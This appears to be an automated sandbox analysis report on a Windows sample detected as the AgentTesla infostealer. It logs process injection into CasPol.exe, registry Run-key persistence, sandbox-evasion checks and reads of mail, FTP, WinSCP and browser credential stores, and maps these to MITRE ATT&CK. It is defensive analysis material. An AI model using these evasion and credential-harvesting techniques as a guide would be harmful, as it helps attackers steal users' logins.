Static PE information: section name: .text entropy: 7.996815914318105

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

File created: C:\Users\user\AppData\Roaming\newapp\newapp.exe

Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run newapp			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run newapp			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Icon mismatch, binary includes an icon from a different legit application in order to fool users

Source: initial sample

Icon embedded in binary file: icon matches a legit application icon: download (67).png

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

File opened: C:\Users\user\AppData\Roaming\newapp\newapp.exe:Zone.Identifier read attributes | delete

Jump to behavior

Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe TID: 5296	Thread sleep count: 299 > 30	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe TID: 2400	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1324	Thread sleep time: -7378697629483816s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2148	Thread sleep count: 9649 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 2100	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 1116	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Window / User API: threadDelayed 9649

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: CasPol.exe, 0000000A.00000003.399211019.000000000590A000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 10_2_05DF7BF0 LdrInitializeThunk,

10_2_05DF7BF0

Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Writes to foreign memory regions

Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 402000	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 438000	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 43E000	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 2CD008	Jump to behavior

.NET source code references suspicious native API functions

Source: MACHINE SPECIFICATIONS.exe, C6ean/Ough6.cs	Reference to suspicious API methods: ('Nic8', 'GetProcAddress@kernel32'), ('Ph2ne', 'VirtualProtect@kernel32.dll'), ('Joi3', 'LoadLibraryA@kernel32')
Source: 10.0.CasPol.exe.400000.0.unpack, A/C1.cs	Reference to suspicious API methods: ('A', 'VirtualAllocExNuma@kernel32.dll')
Source: 10.0.CasPol.exe.400000.0.unpack, A/e2.cs	Reference to suspicious API methods: ('A', 'MapVirtualKey@user32.dll')

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe

Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Jump to behavior

Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Queries volume information: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Queries volume information: C:\Users\user\AppData\Roaming\newapp\newapp.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Queries volume information: C:\Users\user\AppData\Roaming\newapp\newapp.exe VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: 10.0.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000000.345984518.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.768390327.00000000028D4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CasPol.exe PID: 688, type: MEMORYSTR

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml			Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior

Source: Yara match	File source: 0000000A.00000002.767841057.0000000002881000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.768390327.00000000028D4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CasPol.exe PID: 688, type: MEMORYSTR

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: 10.0.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000000.345984518.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.768390327.00000000028D4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CasPol.exe PID: 688, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	211 Windows Management Instrumentation	1 Registry Run Keys / Startup Folder	211 Process Injection	1 Disable or Modify Tools	2 OS Credential Dumping	114 System Information Discovery	Remote Services	11 Archive Collected Data	1 Exfiltration Over Alternative Protocol	1 Ingress Tool Transfer	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	1 Native API	Boot or Logon Initialization Scripts	1 Registry Run Keys / Startup Folder	1 Deobfuscate/Decode Files or Information	11 Input Capture	111 Security Software Discovery	Remote Desktop Protocol	2 Data from Local System	Exfiltration Over Bluetooth	11 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	2 Obfuscated Files or Information	1 Credentials in Registry	1 Process Discovery	SMB/Windows Admin Shares	1 Email Collection	Automated Exfiltration	1 Non-Standard Port	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	3 Software Packing	NTDS	131 Virtualization/Sandbox Evasion	Distributed Component Object Model	11 Input Capture	Scheduled Transfer	2 Non-Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	11 Masquerading	LSA Secrets	1 Application Window Discovery	SSH	1 Clipboard Data	Data Transfer Size Limits	23 Application Layer Protocol	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	131 Virtualization/Sandbox Evasion	Cached Domain Credentials	1 Remote System Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	211 Process Injection	DCSync	1 System Network Configuration Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	1 Hidden Files and Directories	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
MACHINE SPECIFICATIONS.exe	59%	Virustotal		Browse
MACHINE SPECIFICATIONS.exe	73%	ReversingLabs	ByteCode-MSIL.Trojan.AgentTesla
MACHINE SPECIFICATIONS.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\newapp\newapp.exe	0%	ReversingLabs

Unpacked PE Files

